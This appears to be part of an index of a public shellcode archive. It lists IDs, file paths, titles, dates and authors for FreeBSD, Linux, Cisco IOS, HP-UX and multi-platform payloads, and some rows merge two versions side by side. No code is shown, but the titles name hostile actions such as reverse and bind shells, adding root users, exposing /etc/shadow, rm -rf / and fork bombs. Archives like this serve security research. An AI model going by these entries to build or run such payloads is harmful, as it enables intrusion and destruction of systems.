35 13275 shellcodes/freebsd_x86/13275.c FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes) 2004-09-26 dev0id shellcode freebsd_x86
36 13276 shellcodes/freebsd_x86/13276.c FreeBSD/x86 - chown 0:0 + chmod 6755 + execve /tmp/sh Shellcode (44 bytes) FreeBSD/x86 - chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes) 2004-09-26 Claes Nyberg Claes M. Nyberg shellcode freebsd_x86
37 13277 shellcodes/freebsd_x86/13277.c FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes) FreeBSD/x86 - execve(/tmp/sh) Shellcode (34 bytes) 2004-09-26 Claes Nyberg Claes M. Nyberg shellcode freebsd_x86
38 13278 shellcodes/freebsd_x86/13278.asm FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes) 2004-09-26 Scrippie shellcode freebsd_x86
39 13279 shellcodes/freebsd_x86-64/13279.c FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes) 2009-05-18 Hack'n Roll shellcode freebsd_x86-64
40 13280 shellcodes/freebsd_x86-64/13280.c FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes) FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes) 2009-05-15 c0d3_z3r0 shellcode freebsd_x86-64
41 13281 shellcodes/generator/13281.c Linux/x86 - execve Null-Free Shellcode (Generator) Linux/x86 - execve() Null-Free Shellcode (Generator) 2009-06-29 certaindeath shellcode generator
42 13282 shellcodes/generator/13282.php Linux/x86 - Bind TCP Shell Shellcode (Generator) 2009-06-09 Jonathan Salwan shellcode generator
43 13283 shellcodes/generator/13283.php Windows XP SP1 - Bind TCP Shell Shellcode (Generator) 2009-06-09 Jonathan Salwan shellcode generator
44 13284 shellcodes/generator/13284.txt Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator) Linux - execve(/bin/sh) + Polymorphic + Printable ASCII Characters Shellcode (Generator) 2008-08-31 sorrow shellcode generator
45 13285 shellcodes/generator/13285.c Linux/x86 - Command Generator Null-Free Shellcode (Generator) 2008-08-19 BlackLight shellcode generator
46 13286 shellcodes/generator/13286.c Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator) 2008-08-04 Avri Schneider shellcode generator
47 13288 shellcodes/generator/13288.c (Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes) 2006-10-22 izik shellcode generator
50 13291 shellcodes/hardware/13291.txt Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode 2008-08-13 Gyan Chawdhary shellcode hardware
51 13292 shellcodes/hardware/13292.txt Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) 2008-08-13 Varun Uppal shellcode hardware
52 13293 shellcodes/hardware/13293.txt Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode 2008-08-13 Gyan Chawdhary shellcode hardware
53 13295 shellcodes/hp-ux/13295.txt HP-UX - execve /bin/sh Shellcode (58 bytes) HP-UX - execve(/bin/sh) Shellcode (58 bytes) 2004-09-26 K2 shellcode hp-ux
54 13296 shellcodes/linux_x86-64/13296.c Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes) 2008-11-28 gat3way shellcode linux_x86-64
55 13297 shellcodes/generator/13297.c Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator) 2006-04-21 phar shellcode generator
56 13298 shellcodes/linux_mips/13298.c Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes) 2008-08-18 vaicebine shellcode linux_mips
57 13299 shellcodes/linux_mips/13299.c Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes) 2008-08-18 vaicebine shellcode linux_mips
58 13300 shellcodes/linux_mips/13300.c Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes) 2005-11-09 core shellcode linux_mips
59 13301 shellcodes/linux_ppc/13301.c Linux/PPC - execve /bin/sh Shellcode (60 bytes) Linux/PPC - execve(/bin/sh) Shellcode (60 bytes) 2005-11-09 Charles Stevenson shellcode linux_ppc
60 13302 shellcodes/linux_ppc/13302.c Linux/PPC - read + exec Shellcode (32 bytes) 2005-11-09 Charles Stevenson shellcode linux_ppc
61 13303 shellcodes/linux_ppc/13303.c Linux/PPC - Reverse TCP (192.168.1.1:31337/TCP) Shell (/bin/sh) Shellcode (240 bytes) 2005-11-09 Charles Stevenson shellcode linux_ppc
62 13304 shellcodes/linux_ppc/13304.c Linux/PPC - execve /bin/sh Shellcode (112 bytes) Linux/PPC - execve(/bin/sh) Shellcode (112 bytes) 2004-09-12 Palante shellcode linux_ppc
63 13305 shellcodes/linux_sparc/13305.c Linux/SPARC - Reverse TCP (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes) 2004-09-26 killah shellcode linux_sparc
64 13306 shellcodes/linux_sparc/13306.c Linux/SPARC - Bind TCP (8975/TCP) Shell + Null-Free Shellcode (284 bytes) 2004-09-12 killah shellcode linux_sparc
65 13307 shellcodes/linux_x86/13307.c Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes) Linux/x86 - /bin/sh + Self-Modifying Anti-IDS Shellcode (35/64 bytes) 2009-09-15 XenoMuta shellcode linux_x86
66 13308 shellcodes/linux_x86/13308.c Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes) 2009-09-15 XenoMuta shellcode linux_x86
67 13309 shellcodes/linux_x86/13309.asm Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes) 2009-09-09 XenoMuta shellcode linux_x86
68 13310 shellcodes/linux_x86/13310.c Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes) Linux/x86 - Disable Network Card + Polymorphic Shellcode (75 bytes) 2009-08-26 Jonathan Salwan shellcode linux_x86
69 13311 shellcodes/linux_x86/13311.c Linux/x86 - killall5 Polymorphic Shellcode (61 bytes) Linux/x86 - killall5 + Polymorphic Shellcode (61 bytes) 2009-08-11 Jonathan Salwan shellcode linux_x86
70 13312 shellcodes/linux_x86/13312.c Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes) Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (48 bytes) 2009-08-11 Jonathan Salwan shellcode linux_x86
71 13313 shellcodes/linux_x86/13313.c Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + XOR Encoded Shellcode (152 bytes) 2009-07-10 Rick shellcode linux_x86
72 13314 shellcodes/linux_x86/13314.c Linux/x86 - reboot() Polymorphic Shellcode (57 bytes) Linux/x86 - reboot() + Polymorphic Shellcode (57 bytes) 2009-06-29 Jonathan Salwan shellcode linux_x86
73 13315 shellcodes/linux_x86/13315.c Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes) Linux/x86 - chmod 666 /etc/shadow + Polymorphic Shellcode (54 bytes) 2009-06-22 Jonathan Salwan shellcode linux_x86
74 13316 shellcodes/linux_x86/13316.c Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes) 2009-06-16 blue9057 shellcode linux_x86
75 13317 shellcodes/linux_x86/13317.s Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes) 2009-06-08 Jonathan Salwan shellcode linux_x86
76 13318 shellcodes/linux_x86/13318.s Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes) 2009-06-08 Jonathan Salwan shellcode linux_x86
101 13343 shellcodes/linux_x86/13343.asm Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes) 2007-04-02 mu-b shellcode linux_x86
102 13344 shellcodes/linux_x86/13344.c Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes) 2007-03-09 Kris Katterjohn shellcode linux_x86
103 13345 shellcodes/linux_x86/13345.c Linux/x86 - Kill All Processes Shellcode (11 bytes) 2007-03-09 Kris Katterjohn shellcode linux_x86
104 13346 shellcodes/linux_x86/13346.s Linux/x86 - execve read Shellcode (92 bytes) Linux/x86 - execve() Read Shellcode (92 bytes) 2006-11-20 0ut0fbound shellcode linux_x86
105 13347 shellcodes/linux_x86/13347.c Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes) 2006-11-17 Kris Katterjohn shellcode linux_x86
106 13348 shellcodes/linux_x86/13348.c Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes) 2006-11-17 Kris Katterjohn shellcode linux_x86
107 13349 shellcodes/linux_x86/13349.c Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes) 2006-11-17 Kris Katterjohn shellcode linux_x86
108 13350 shellcodes/linux_x86/13350.c Linux/x86 - chmod 0666 /etc/shadow + exit Shellcode (36 bytes) 2006-11-17 Kris Katterjohn shellcode linux_x86
109 13351 shellcodes/linux_x86/13351.c Linux/x86 - Fork Bomb Shellcode (7 bytes) 2006-11-17 Kris Katterjohn shellcode linux_x86
110 13352 shellcodes/linux_x86/13352.c Linux/x86 - execve(rm -rf /) Shellcode (45 bytes) 2006-11-17 Kris Katterjohn shellcode linux_x86
111 13353 shellcodes/linux_x86/13353.c Linux/x86 - setuid(0) + execve /bin/sh Shellcode (28 bytes) Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes) 2006-11-16 Revenge shellcode linux_x86
112 13354 shellcodes/linux_x86/13354.c Linux/x86 - execve /bin/sh Shellcode (22 bytes) Linux/x86 - execve(/bin/sh) Shellcode (22 bytes) 2006-11-16 Revenge shellcode linux_x86
113 13355 shellcodes/linux_x86/13355.c Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes) 2006-10-22 izik shellcode linux_x86
114 13356 shellcodes/linux_x86/13356.c Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes) 2006-08-02 bunker shellcode linux_x86
115 13357 shellcodes/linux_x86/13357.c Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
116 13358 shellcodes/linux_x86/13358.c Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes) Linux/x86 - execve(/bin/sh) (Re-Use Of Strings In .rodata) Shellcode (16 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
117 13359 shellcodes/linux_x86/13359.c Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
118 13360 shellcodes/linux_x86/13360.c Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid Shellcode (96 bytes) Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid() Shellcode (96 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
119 13361 shellcodes/linux_x86/13361.c Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes) 2006-07-04 oveRet shellcode linux_x86
120 13362 shellcodes/linux_x86/13362.c Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes) Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes) 2006-05-14 BaCkSpAcE shellcode linux_x86
121 13363 shellcodes/linux_x86/13363.c Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes) 2006-05-08 Benjamin Orozco shellcode linux_x86
122 13364 shellcodes/generator/13364.c Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator) 2006-05-08 Benjamin Orozco shellcode generator
123 13365 shellcodes/linux_x86/13365.c Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2) Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (2) 2006-05-01 hophet shellcode linux_x86
124 13366 shellcodes/linux_x86/13366.txt Linux/x86 - Reverse TCP (127.0.0.1:80/TCP) Shell + XOR Encoded Shellcode (371 bytes) 2006-04-18 xort shellcode linux_x86
125 13367 shellcodes/linux_x86/13367.c Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes) Linux/x86 - execve(/bin/sh) + '.ZIP' Header Shellcode (28 bytes) 2006-04-17 izik shellcode linux_x86
126 13368 shellcodes/linux_x86/13368.c Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes) Linux/x86 - execve(/bin/sh) + '.RTF' Header Shellcode (30 bytes) 2006-04-17 izik shellcode linux_x86
127 13369 shellcodes/linux_x86/13369.c Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes) Linux/x86 - execve(/bin/sh) + '.RIFF' Header Shellcode (28 bytes) 2006-04-17 izik shellcode linux_x86
128 13370 shellcodes/linux_x86/13370.c Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes) Linux/x86 - execve(/bin/sh) + '.BMP' Bitmap Header Shellcode (27 bytes) 2006-04-17 izik shellcode linux_x86
129 13371 shellcodes/linux_x86/13371.c Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes) 2006-04-16 Gotfault Security shellcode linux_x86
130 13372 shellcodes/linux_x86/13372.c Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes) 2006-04-16 Gotfault Security shellcode linux_x86
131 13373 shellcodes/linux_x86/13373.c Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) + Password (gotfault) Shellcode (166 bytes) 2006-04-06 Gotfault Security shellcode linux_x86
137 13379 shellcodes/linux_x86/13379.c Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes) 2006-04-03 Gotfault Security shellcode linux_x86
138 13380 shellcodes/linux_x86/13380.c Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes) 2006-03-12 izik shellcode linux_x86
139 13381 shellcodes/linux_x86/13381.c Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes) 2006-02-07 phar shellcode linux_x86
140 13382 shellcodes/linux_x86/13382.c Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes) Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (40 bytes) 2006-01-26 NicatiN shellcode linux_x86
141 13383 shellcodes/linux_x86/13383.c Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes) Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes) 2006-01-25 izik shellcode linux_x86
142 13384 shellcodes/linux_x86/13384.c Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes) Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes) 2006-01-25 izik shellcode linux_x86
143 13385 shellcodes/linux_x86/13385.c Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes) 2006-01-21 izik shellcode linux_x86
144 13386 shellcodes/linux_x86/13386.c Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes) Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes) 2006-01-21 izik shellcode linux_x86
145 13387 shellcodes/linux_x86/13387.c Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes) 2006-01-21 izik shellcode linux_x86
146 13388 shellcodes/linux_x86/13388.c Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes) 2006-01-21 izik shellcode linux_x86
147 13389 shellcodes/linux_x86/13389.c Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes) 2006-01-21 izik shellcode linux_x86
153 13395 shellcodes/linux_x86/13395.c Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes) 2006-01-21 izik shellcode linux_x86
154 13396 shellcodes/linux_x86/13396.c Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes) 2006-01-21 izik shellcode linux_x86
155 13397 shellcodes/linux_x86/13397.c Linux/x86 - reboot() Shellcode (20 bytes) 2006-01-21 izik shellcode linux_x86
156 13398 shellcodes/linux_x86/13398.c Linux/x86 - setreuid(0_ 0) + execve /bin/sh Shellcode (31 bytes) Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes) 2006-01-21 izik shellcode linux_x86
157 13399 shellcodes/linux_x86/13399.c Linux/x86 - execve /bin/sh + PUSH Shellcode (23 bytes) Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes) 2006-01-21 izik shellcode linux_x86
158 13400 shellcodes/linux_x86/13400.c Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes) 2006-01-21 izik shellcode linux_x86
159 13401 shellcodes/generator/13401.c Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator) 2005-12-28 xort shellcode generator
160 13402 shellcodes/linux_x86/13402.c Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes) 2005-12-28 xort shellcode linux_x86
164 13406 shellcodes/linux_x86/13406.c Linux/x86 - read(0_buf_2541) + chmod(buf_4755) Shellcode (23 bytes) 2005-11-09 Charles Stevenson shellcode linux_x86
165 13407 shellcodes/linux_x86/13407.c Linux/x86 - write(0__Hello core!\n__12) + Exit Shellcode (36/43 bytes) 2005-11-09 Charles Stevenson shellcode linux_x86
166 13408 shellcodes/linux_x86/13408.c Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes) 2005-11-04 phar shellcode linux_x86
167 13409 shellcodes/linux_x86/13409.c Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes) Linux/x86 - execve(/bin/sh) Standard Opcode Array Payload Shellcode (21 bytes) 2005-09-15 c0ntex shellcode linux_x86
168 13410 shellcodes/linux_x86/13410.s Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2) 2005-09-09 xort shellcode linux_x86
169 13411 shellcodes/linux_x86/13411.c Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1) 2005-09-08 xort shellcode linux_x86
170 13412 shellcodes/linux_x86/13412.c Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes) Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes) 2005-09-04 BaCkSpAcE shellcode linux_x86
171 13413 shellcodes/linux_x86/13413.c Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes) Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (27 bytes) 2005-08-25 amnesia shellcode linux_x86
172 13414 shellcodes/linux_x86/13414.c Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes) Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (45 bytes) 2005-08-19 c0ntex shellcode linux_x86
173 13415 shellcodes/linux_x86/13415.c Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes) Linux/x86 - Break chroot (../ 20x Loop) + execve(/bin/sh) Shellcode (66 bytes) 2005-07-11 Okti shellcode linux_x86
174 13416 shellcodes/linux_x86/13416.txt Linux/x86 - upload + exec Shellcode (189 bytes) 2005-06-19 cybertronic shellcode linux_x86
175 13417 shellcodes/linux_x86/13417.c Linux/x86 - setreuid + execve Shellcode (31 bytes) Linux/x86 - setreuid() + execve() Shellcode (31 bytes) 2004-12-26 oc192 shellcode linux_x86
176 13418 shellcodes/linux_x86/13418.c Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes) 2004-12-22 xort shellcode linux_x86
177 13419 shellcodes/linux_x86/13419.c Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes) 2004-12-22 xort shellcode linux_x86
178 13420 shellcodes/linux_x86/13420.c Linux/x86 - Self-Modifying Radical Shellcode (70 bytes) 2004-12-22 xort shellcode linux_x86
179 13421 shellcodes/linux_x86/13421.c Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes) 2004-12-22 xort shellcode linux_x86
180 13422 shellcodes/linux_x86/13422.c Linux/x86 - execve code Shellcode (23 bytes) Linux/x86 - execve() Shellcode (23 bytes) 2004-11-15 marcetam shellcode linux_x86
181 13423 shellcodes/linux_x86/13423.c Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes) 2004-11-15 zasta shellcode linux_x86
182 13424 shellcodes/linux_x86/13424.txt Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes) Linux/x86 - execve(/bin/sh) Alphanumeric Shellcode (392 bytes) 2004-09-26 RaiSe shellcode linux_x86
183 13425 shellcodes/linux_x86/13425.c Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes) Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes) 2004-09-26 anathema shellcode linux_x86
184 13426 shellcodes/linux_x86/13426.c shellcodes/bsd_x86/13426.c Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes) BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes) 2004-09-26 dev0id shellcode linux_x86 bsd_x86
185 13427 shellcodes/linux_x86/13427.c Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes) 2004-09-26 Tora shellcode linux_x86
186 13428 shellcodes/linux_x86/13428.c Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes) Linux/x86 - Add Root User (t00r) + Anti-IDS Shellcode (116 bytes) 2004-09-26 Matias Sedalo shellcode linux_x86
187 13429 shellcodes/linux_x86/13429.c Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes) Linux/x86 - chmod 666 /etc/shadow + Anti-IDS Shellcode (75 bytes) 2004-09-26 Matias Sedalo shellcode linux_x86
188 13430 shellcodes/linux_x86/13430.c shellcodes/bsd_x86/13430.c Linux/x86 - symlink . /bin/sh Shellcode (32 bytes) BSD/x86 - symlink . /bin/sh Shellcode (32 bytes) 2004-09-26 dev0id shellcode linux_x86 bsd_x86
189 13431 shellcodes/linux_x86/13431.c Linux/x86 - Kill Snort Shellcode (151 bytes) 2004-09-26 nob0dy shellcode linux_x86
190 13432 shellcodes/linux_x86/13432.c Linux/x86 - Execute At Shared Memory Shellcode (50 bytes) 2004-09-26 sloth shellcode linux_x86
191 13433 shellcodes/linux_x86/13433.c Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes) 2004-09-26 UnboundeD shellcode linux_x86
198 13440 shellcodes/linux_x86/13440.c Linux/x86 - xterm -ut -display 1270.0.0.1:0 Shellcode (132 bytes) 2004-09-26 RaiSe shellcode linux_x86
199 13441 shellcodes/linux_x86/13441.c Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes) 2004-09-26 Sp4rK shellcode linux_x86
200 13442 shellcodes/linux_x86/13442.c Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes) 2004-09-26 Matias Sedalo shellcode linux_x86
201 13443 shellcodes/linux_x86/13443.c Linux/x86 - execve /bin/sh Shellcode (29 bytes) Linux/x86 - execve(/bin/sh) Shellcode (29 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
202 13444 shellcodes/linux_x86/13444.c Linux/x86 - execve /bin/sh Shellcode (24 bytes) (3) Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (3) 2004-09-12 Matias Sedalo shellcode linux_x86
203 13445 shellcodes/linux_x86/13445.c Linux/x86 - execve /bin/sh Shellcode (38 bytes) Linux/x86 - execve(/bin/sh) Shellcode (38 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
204 13446 shellcodes/linux_x86/13446.c Linux/x86 - execve /bin/sh Shellcode (30 bytes) Linux/x86 - execve(/bin/sh) Shellcode (30 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
205 13447 shellcodes/linux_x86/13447.c Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes) Linux/x86 - execve(/bin/sh) + setreuid(12_12) Shellcode (50 bytes) 2004-09-12 anonymous shellcode linux_x86
206 13448 shellcodes/linux_x86/13448.c Linux/x86 - Bind TCP (5074/TCP) Shell Shellcode (92 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
207 13449 shellcodes/linux_x86/13449.c Linux/x86 - Bind TCP (5074/TCP) Shell + fork() Shellcode (130 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
208 13450 shellcodes/linux_x86/13450.c Linux/x86 - Add Root User (t00r) Shellcode (82 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
209 13451 shellcodes/linux_x86/13451.c Linux/x86 - Add Root User Shellcode (104 bytes) 2004-09-12 Matt Conover shellcode linux_x86
210 13452 shellcodes/linux_x86/13452.c Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes) Linux/x86 - Break chroot (../ 10x Loop) Shellcode (28 bytes) 2004-09-12 dev0id shellcode linux_x86
211 13453 43633 shellcodes/linux_x86/13453.c shellcodes/openbsd_x86/43633.c Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes) OpenBSD/x86 - Load Kernel Module (/tmp/o.o) Shellcode (66 bytes) 2004-09-12 2009-01-01 dev0id shellcode linux_x86 openbsd_x86
212 13454 13453 shellcodes/linux_x86/13454.c shellcodes/bsd_x86/13453.c Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes) BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes) 2004-09-12 preedator dev0id shellcode linux_x86 bsd_x86
213 13455 13454 shellcodes/linux_x86/13455.c shellcodes/linux_x86/13454.c Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes) Linux/x86 - Break chroot + execve(/bin/sh) Shellcode (80 bytes) 2004-09-12 Matias Sedalo preedator shellcode linux_x86
214 13456 13455 shellcodes/linux_x86/13456.c shellcodes/linux_x86/13455.c Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes) Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (58 bytes) 2004-09-12 anonymous Matias Sedalo shellcode linux_x86
215 13457 13456 shellcodes/linux_x86/13457.c shellcodes/linux_x86/13456.c Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes) Linux/x86 - execve(/bin/sh) XOR Encoded Shellcode (55 bytes) 2004-09-12 anonymous shellcode linux_x86
216 13458 13457 shellcodes/linux_x86/13458.c shellcodes/linux_x86/13457.c Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes) Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes) 2001-05-07 2004-09-12 Marco Ivaldi anonymous shellcode linux_x86
217 13460 13458 shellcodes/linux_x86/13460.c shellcodes/linux_x86/13458.c Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/sh) Shellcode (46+ bytes) 2000-08-08 2001-05-07 anonymous Marco Ivaldi shellcode linux_x86
218 13460 shellcodes/linux_x86/13460.c Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes) 2000-08-08 anonymous shellcode linux_x86
219 13461 shellcodes/linux_x86/13461.c Linux/x86 - Add Root User (z) Shellcode (70 bytes) 2000-08-07 anonymous shellcode linux_x86
220 13462 shellcodes/linux_x86/13462.c Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes) Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes) 2000-08-07 anonymous shellcode linux_x86
221 13463 shellcodes/linux_x86-64/13463.c Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes) 2009-05-18 evil.xi4oyu shellcode linux_x86-64
222 13464 shellcodes/linux_x86-64/13464.s Linux/x86-64 - execve /bin/sh Shellcode (33 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes) 2006-11-02 hophet shellcode linux_x86-64
223 13465 shellcodes/multiple/13465.c Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes) 2005-11-15 Charles Stevenson shellcode multiple
224 13466 shellcodes/multiple/13466.c OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes) 2005-11-13 nemo shellcode multiple
225 13467 shellcodes/multiple/13467.c Linux/x86 / Unix/SPARC / IRIX/MIPS - execve /bin/sh Shellcode (141 bytes) Linux/x86 / Unix/SPARC / IRIX/MIPS - execve(/bin/sh) Shellcode (141 bytes) 2004-09-12 dymitri shellcode multiple
226 13468 shellcodes/multiple/13468.c Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes) Linux/x86 / Unix/SPARC - execve(/bin/sh) Shellcode (80 bytes) 2004-09-12 dymitri shellcode multiple
227 13469 shellcodes/multiple/13469.c BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes) BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes) 2004-09-12 dymitri shellcode multiple
